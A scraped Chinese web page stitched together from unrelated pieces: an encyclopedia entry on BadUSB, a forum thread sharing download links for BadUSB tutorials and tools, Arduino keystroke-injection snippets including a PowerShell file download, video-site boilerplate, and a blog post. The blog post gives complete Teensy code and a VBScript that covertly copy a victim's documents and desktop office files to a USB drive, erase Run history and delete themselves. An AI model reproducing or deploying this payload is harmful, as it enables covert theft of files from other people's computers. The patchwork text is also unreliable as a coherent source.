BadUSBdnfbuff强化怎么用?

简介/BadUSB
图展示了一个被打开的USB的存储芯片;控制器芯片在电路板的另一侧。 BadUSB主要依靠USB拇指驱动器的构建方式,USB通常有一个大的可重写的内存芯片用于实际的数据存储,以及一个独立的控制器芯片。这个控制芯片实际上是一个低功耗计算机,并且与你的笔记本电脑或台式机一样,它通过从内存芯片加载基本的引导程序来启动。类似于笔记本电脑的硬盘驱动器包含一个隐藏的主引导记录(Master&Boot&Record),内存芯片中内存单元的第一段包含让USB记录的编程。允许攻击者在不被检测到的情况下悄悄在USB设备中植入恶意软件。
感染过程/BadUSB
由于USB实际并没有连接到网络,流量并不会发送到该USB。但通过正常的现有的网络或无线卡的Web请求将会使用恶意DNS服务器,这样一来,发送到银行等机构的请求将会被重定向到这些网站的副本。即使扔掉感染的USB设备,聪明的攻击者将通过受害者电脑的USB端口来传播这种感染,可能通过系统中不太明显的USB驱动的组件。即使完全清楚和重新加载电脑,当重新启动时,其他电脑仍将会被感染,并会进一步传播感染。
影响程度/BadUSB
此次发现的安全漏洞短期内无法修复,恶意软件扫描工具以及杀毒软件等根本查不到USB设备的固件。目前全球已经有数十亿个USB设备,其中任何一个设备都有可能被改写了固件,而除非实现知晓问题设备所在,否则根本无从查起 。
源代码公布/BadUSB
在DerbyCon黑客大会上,两位安全研究人员亚当·考蒂尔(Adam&Caudill)和布兰顿·威尔森(Brandon&Wilson)称,他们已对BadUSB进行了“反向工程”(reverse-engineered)。他们在GitHub上发布了相关代码,并演示了多种用途,包括攻击并控制目标用户的键盘输入。考蒂尔称,他们发布的动机是向制造商施压。但是,此举并的“净效应”并不能推动USB安全。因为黑客可以对USB固件进行重新编程,反而使其威胁性更大。修复该漏洞的唯一方案是在固件上打造一个全新的安全层,但这需要对USB标准进行全面更新,也就意味着这种不安全性将持续数年。
&|&相关影像
互动百科的词条(含所附图片)系由网友上传,如果涉嫌侵权,请与客服联系,我们将按照法律之相关规定及时进行处理。未经许可,禁止商业网站等复制、抓取本站内容;合理使用者,请注明来源于www.baike.com。
登录后使用互动百科的服务,将会得到个性化的提示和帮助,还有机会和专业认证智愿者沟通。
此词条还可添加&
编辑次数:4次
参与编辑人数:1位
最近更新时间: 18:36:31
贡献光荣榜
扫码下载APP求mrzcpo大神在”利用BadUsb5秒内黑掉一台电脑 “贴子上面的视频教程 - 『悬赏问答区』
- 吾爱破解 - LCG - LSG |安卓破解|病毒分析|破解软件|www.52pojie.cn
后使用快捷导航没有帐号?
只需一步,快速开始
请完成以下验证码
请完成以下验证码
查看: 1466|回复: 8
求mrzcpo大神在”利用BadUsb5秒内黑掉一台电脑 “贴子上面的视频教程
阅读权限10
本帖最后由 牛逼烘烘~ 于
16:53 编辑
在论坛上面看见大神发的帖子”【原创】BadUsb利用代码 5秒黑掉你 - 『编程语言区』 - 吾爱 - LCG - LSG |安卓破解||破解软件|&&& & “后很想学习下,可是帖子上面附上的教程视频链接却挂了,无奈,本人小白,没有教程根本搞不懂,问下论坛中有没有人电脑里还保存有这个视频教程的,悬赏80吾爱币,给个链接,谢谢坐等。。。。。
教程1+工具
地址: http://pan.baidu.com/s/1dDjqvr7 密码: 96mj
链接: http://pan.baidu.com/s/1pJOn87p 密码: a86t
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限10
教程1+工具
地址: http://pan.baidu.com/s/1dDjqvr7 密码: 96mj
链接: http://pan.baidu.com/s/1pJOn87p 密码: a86t
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限30
违规了,不要留联系方式
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限10
请采纳谢谢& && && && && && && && &
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限10
第二个链接挂了,但还是谢谢!
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限10
教程1+工具
地址: http://pan.baidu.com/s/1dDjqvr7 密码: 96mj
求第二个链接
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限25
关键是你要买USBBAD
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限10
上面链接的也是大神哈。
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限20
链接还在,谢谢分享!!!
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
免责声明:吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。
( 京ICP备号 | 京公网安备 87号 )
Powered by Discuz!
Comsenz Inc.简易BadUSB,攻击效果不简单
不久前,有小伙伴在实验室捡到一个U盘,想看看是谁的就插在了自己的电脑上,结果出现了安全软件的报毒通知……也是因为这件事有了制作一个BadUSB的想法,可以在不被杀毒软件发现的情况下进行一些操作。一、前期准备Arduino:这里使用的是BS Micro pro micro leonardo Arduino开发板。 Arduino IDE:
二、原理BadUSB插入后会模拟键盘、鼠标对电脑进行操作,通过这些操作可以打开CMD或者Powershell并输入命令,通过这些命令可以进行简单操作或者更深一步从服务器下载文件执行。通过下载的.exe及.ps1等文件可以实现信息窃取、发送邮件等,从而达到控制目标机或者窃取信息等目的。 三、过程(1)实现弹窗关键代码:Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r');Keyboard.print("mshtavbscript:msgbox(\"lalala\",64,\"lalalatitle\")(window.close)");Keyboard.press(KEY_RETURN);
(2)关闭所有窗口关键代码:Keyboard.press(KEY_LEFT_ALT);Keyboard.press(KEY_F4); Keyboard.press(KEY_RETURN);正常情况下是Alt+F4循环使用的效果是关闭所有窗口,但很大概率会出现自动关机的状况…… (3)从服务器端下载文件关键代码:Keyboard.press(KEY_LEFT_CTRL);Keyboard.press(KEY_ESC);Keyboard.releaseAll(); Keyboard.print("powershell");Keyboard.press(KEY_RETURN);Keyboard.print("(new-objectSystem.Net.WebClient).DownloadFile('http://www.example.com/example.html','d:lalala.html')");这里只是下载了一个命名为lalala.html的文件,如果下载一个可执行文件或者Powershell脚本可以做到更多的事! 因为BadUSB模仿的是键盘、鼠标操作,所以常规的安全软件、杀毒软件不能起作用,当然防范起来也很简单:只要不让不受你信任的USB插入你心爱的电脑就不存在安全问题。但是好奇心驱使下还是有很多人会将“捡到”的U盘插入自己的电脑看看是谁的U盘、里面有什么文件。看到这篇文章之后要对来路不明的USB设备多一点防备了。
没有更多推荐了,
加入CSDN,享受更精准的内容推荐,与500万程序员共同成长!更多频道内容在这里查看
爱奇艺用户将能永久保存播放记录
过滤短视频
暂无长视频(电视剧、纪录片、动漫、综艺、电影)播放记录,
按住视频可进行拖动
&正在加载...
举报视频:
举报原因(必填):
请说明举报原因(300字以内):
请输入您的反馈
举报理由需要输入300字以内
感谢您的反馈~
请勿重复举报~
请刷新重试~
收藏成功,可进入
查看所有收藏列表
当前浏览器仅支持手动复制代码
视频地址:
flash地址:
html代码:
通用代码:
通用代码可同时支持电脑和移动设备的分享播放
用爱奇艺APP或微信扫一扫,在手机上继续观看
当前播放时间:
一键下载至手机
限爱奇艺安卓6.0以上版本
使用微信扫一扫,扫描左侧二维码,下载爱奇艺移动APP
其他安装方式:手机浏览器输入短链接http://71.am/udn
下载安装包到本机:
设备搜寻中...
请确保您要连接的设备(仅限安卓)登录了同一爱奇艺账号 且安装并开启不低于V6.0以上版本的爱奇艺客户端
连接失败!
请确保您要连接的设备(仅限安卓)登录了同一爱奇艺账号 且安装并开启不低于V6.0以上版本的爱奇艺客户端
部安卓(Android)设备,请点击进行选择
请您在手机端下载爱奇艺移动APP(仅支持安卓客户端)
使用微信扫一扫,下载爱奇艺移动APP
其他安装方式:手机浏览器输入短链接http://71.am/udn
下载安装包到本机:
爱奇艺云推送
请您在手机端登录爱奇艺移动APP(仅支持安卓客户端)
使用微信扫一扫,下载爱奇艺移动APP
180秒后更新
打开爱奇艺移动APP,点击“我的-扫一扫”,扫描左侧二维码进行登录
没有安装爱奇艺视频最新客户端?
BadUSB~测试
正在检测客户端...
您尚未安装客户端,正在为您下载...安装完成后点击按钮即可下载
30秒后自动关闭
BadUSB~测试">BadUSB~测试
请选择打赏金额:
播放量12.7万
播放量数据:快去看看谁在和你一起看视频吧~
更多数据:
热门短视频推荐
Copyright (C) 2018 & All Rights Reserved
您使用浏览器不支持直接复制的功能,建议您使用Ctrl+C或右键全选进行地址复制
正在为您下载爱奇艺客户端安装后即可快速下载海量视频
正在为您下载爱奇艺客户端安装后即可免费观看1080P视频
&li data-elem="tabtitle" data-seq="{{seq}}"& &a href="javascript:void(0);"& &span>{{start}}-{{end}}&/span& &/a& &/li&
&li data-downloadSelect-elem="item" data-downloadSelect-selected="false" data-downloadSelect-tvid="{{tvid}}"& &a href="javascript:void(0);"&{{pd}}&/a&
选择您要下载的《
后才可以领取积分哦~
每观看视频30分钟
+{{data.viewScore}}分
{{data.viewCount}}/3
{{if data.viewCount && data.viewCount != "0" && data.viewCount != "1" && data.viewCount != "2" }}
访问泡泡首页
+{{data.rewardScore}}分
{{if data.rewardCount && data.rewardCount != 0 && data.getRewardDayCount != 0}}1{{else}}0{{/if}}/1
{{if data.rewardCount && data.rewardCount != 0 && data.getRewardDayCount != 0}}
+{{data.signScore}}分
{{data.signCount}}/1
{{if data.signCount && data.signCount != 0}}
色情低俗内容
血腥暴力内容
广告或欺诈内容
侵犯了我的权力
还可以输入
您使用浏览器不支持直接复制的功能,建议您使用Ctrl+C或右键全选进行地址复制打开微信“扫一扫”,打开网页后点击屏幕右上角分享按钮
最近买了个烧鹅,感觉就是个Teensy2++和一个sd读卡器,但是从Teensy官网买。ship过来都不知道什么时候了,还要转运麻烦。
这东西可以做什么呢,我目前的功能是在插上电脑的时候自动把电脑中我的文档中的文件和桌面上的文件复制到u盘,偷文件用,其实可以自定义更多。
先说下缺点:
1.这属于HID攻击,也就是模拟一个键盘,那么缺点就是有3秒左右的时间你不能操作电脑否则运行失败。
2.当要复制的文件很多或者这两个文件夹目录树太大的时候,速度比较慢,毕竟不能usb3.0
3.你的sd卡名字要叫一个特殊的名字,要不代码找不到你的u盘盘符
优点嘛,就是不管有没有开自动运行都能运行,因为这东西完全不靠自动运行
上代码,下面是我写在烧鹅里面的arduino代码
void setup() {
delay(8000);
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
delay(100);
Keyboard.println("cmd /T:32 /K \"mode con: cols=14 lines=1&mode con: cp select=437&mode con:delay=0\"");
delay(200);
Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f&nul");
delay(50);
Keyboard.println("echo Set F=CreateObject(\"Scripting.FileSystemObject\")&%tmp%\\i.vbs");
Keyboard.println("echo o=F.getspecialfolder(2)^&\"\\\"&&%tmp%\\i.vbs");
Keyboard.println("echo For Each A in F.Drives&&%tmp%\\i.vbs");
Keyboard.println("echo If A.DriveType=1 Then&&%tmp%\\i.vbs");
Keyboard.println("echo if strcomp(A.volumename,\"FUNNYDISK\")=0 then&&%tmp%\\i.vbs");
Keyboard.println("echo F.getfile(A.driveletter^&\":\\\\r\\run.vbs\").copy(o)&&%tmp%\\i.vbs");
Keyboard.println("echo createobject(\"wscript.shell\").exec \"wscript \"^&o^&\"run.vbs\"&&%tmp%\\i.vbs");
Keyboard.println("echo exit for&&%tmp%\\i.vbs");
Keyboard.println("echo end if&&%tmp%\\i.vbs");
Keyboard.println("echo end if&&%tmp%\\i.vbs");
Keyboard.println("echo next&&%tmp%\\i.vbs");
Keyboard.println("echo F.DeleteFile(WScript.ScriptFullName)&&%tmp%\\i.vbs");
Keyboard.println("start wscript %tmp%\\i.vbs&exit");
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(300);
void loop()
12345678910111213141516171819202122232425262728293031
void setup() {&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& && delay(8000);&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& && Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);&& Keyboard.set_key1(KEY_R);&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& Keyboard.send_now();&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& delay(100);&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& Keyboard.println("cmd /T:32 /K \"mode con: cols=14 lines=1&mode con: cp select=437&mode con:delay=0\"");&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& && delay(200);&& Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f&nul");&& delay(50);&& Keyboard.println("echo Set F=CreateObject(\"Scripting.FileSystemObject\")&%tmp%\\i.vbs");&& && Keyboard.println("echo o=F.getspecialfolder(2)^&\"\\\"&&%tmp%\\i.vbs");&& && Keyboard.println("echo For Each A in F.Drives&&%tmp%\\i.vbs");&& && Keyboard.println("echo If A.DriveType=1 Then&&%tmp%\\i.vbs");&& && Keyboard.println("echo if strcomp(A.volumename,\"FUNNYDISK\")=0 then&&%tmp%\\i.vbs");&& && Keyboard.println("echo F.getfile(A.driveletter^&\":\\\\r\\run.vbs\").copy(o)&&%tmp%\\i.vbs");&& && Keyboard.println("echo createobject(\"wscript.shell\").exec \"wscript \"^&o^&\"run.vbs\"&&%tmp%\\i.vbs");&& && Keyboard.println("echo exit for&&%tmp%\\i.vbs");&& && Keyboard.println("echo end if&&%tmp%\\i.vbs");&& && Keyboard.println("echo end if&&%tmp%\\i.vbs");&& && Keyboard.println("echo next&&%tmp%\\i.vbs");&& && Keyboard.println("echo F.DeleteFile(WScript.ScriptFullName)&&%tmp%\\i.vbs");&& && Keyboard.println("start wscript %tmp%\\i.vbs&exit");&& Keyboard.set_modifier(0);&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& && Keyboard.set_key1(0);&& Keyboard.send_now();&&&&&&&&&&&&&&&&&&&& delay(300);&&&&}void loop(){}
这么选择就可以了
第一个延时8秒用于等待系统安装硬件
上面这段代码除了延时8秒以外执行时间大概在3秒左右,这就是不能操作电脑的时候,并且会有一个小cmd窗口。
这段代码会复制funnydisk名字的u盘中r目录里面的run.vbs到%tmp%
u盘目录类似下图
下面是我的run.vbs代码,也可以自定义成别的功能
on error resume next
set f=createobject("scripting.filesystemobject")
set ws=createobject("wscript.shell")
dsk=ws.specialfolders("desktop")
myf=ws.specialfolders("mydocuments")
if not f.folderexists(f.getparentfoldername(p)) then
cf f.getparentfoldername(p)
f.createfolder(p)
sub docopy(p,tard)
set of=f.getfolder(p)
set ofs=of.subfolders
set files=of.files
if not (isempty(files) and isnull(files)) then
for each fi in files
if right(fi.path,3)="xls" or right(fi.path,3)="doc" or right(fi.path,4)="docx" or right(fi.path,4)="xlsx" or right(fi.path,3)="txt" or right(fi.path,3)="ppt" or right(fi.path,4)="pptx" then
if fi.size& then
tpath=fd&"\"&ws.environment("process").item("computername")&"\"&replace(fi.path,":","")
if f.folderexists(f.getparentfoldername(tpath))=0 then
cf f.getparentfoldername(tpath)
f.copyfile fi.path,tpath
if err.number&&0 and err.number&&70 then
f.DeleteFile(WScript.ScriptFullName)
for each osf in ofs
docopy osf.path,tard
if err.number&&0 then
f.DeleteFile(WScript.ScriptFullName)
set of=nothing
set ofs=nothing
set files=nothing
set fi=nothing
set osf=nothing
do while 1
for each d in f.drives
if d.drivetype=1 then
if strcomp(d.volumename,"FUNNYDISK")=0 then
fd=d.driveletter&":"
if fd&&"" then exit do
wscript.sleep(50)
docopy myf,fd
docopy dsk,fd
f.DeleteFile(WScript.ScriptFullName)
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263
on error resume nextset f=createobject("scripting.filesystemobject")set ws=createobject("wscript.shell")dsk=ws.specialfolders("desktop")myf=ws.specialfolders("mydocuments")&sub cf(p)if not f.folderexists(f.getparentfoldername(p)) then&&cf f.getparentfoldername(p)end iff.createfolder(p)end sub&sub docopy(p,tard)set of=f.getfolder(p)set ofs=of.subfoldersset files=of.filesif not (isempty(files) and isnull(files)) then&&for each fi in files&&&&if right(fi.path,3)="xls" or right(fi.path,3)="doc" or right(fi.path,4)="docx" or right(fi.path,4)="xlsx" or right(fi.path,3)="txt" or right(fi.path,3)="ppt" or right(fi.path,4)="pptx" then&&&&&&if fi.size& then&&&&&&tpath=fd&"\"&ws.environment("process").item("computername")&"\"&replace(fi.path,":","")&&&&&&if f.folderexists(f.getparentfoldername(tpath))=0 then&&&&&&&&cf f.getparentfoldername(tpath)&&&&&&end if&&&&&&f.copyfile fi.path,tpath&&&&&&if err.number&&0 and err.number&&70 then&&&&&&&&&&f.DeleteFile(WScript.ScriptFullName)&&&&&& end if&&&&&&end if&&&&end if&&nextend iffor each osf in ofs&&docopy osf.path,tard&&if err.number&&0 then&&&&&& f.DeleteFile(WScript.ScriptFullName)&&end ifnextset of=nothingset ofs=nothingset files=nothingset fi=nothingset osf=nothingend sub&do while 1 for each d in f.drives &&if d.drivetype=1 then&&&&if strcomp(d.volumename,"FUNNYDISK")=0 then&&&&&&fd=d.driveletter&":"&&&&&&exit for&&&& end if&& end ifnextif fd&&"" then exit dowscript.sleep(50)loop&docopy myf,fddocopy dsk,fd&f.DeleteFile(WScript.ScriptFullName)
这段代码用于循环目录树和复制文件到指定u盘上。
目录树太大遍历时间会增加。。。这是个硬伤
如果时间紧迫可以直接拔下u盘,它自己会删除自己
发现这个烧鹅还是很好玩的,代码写的不好,不要打脸。。。大神请忽略。。
下面就是烧鹅}

我要回帖

更多关于 台式电脑怎么用wifi 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信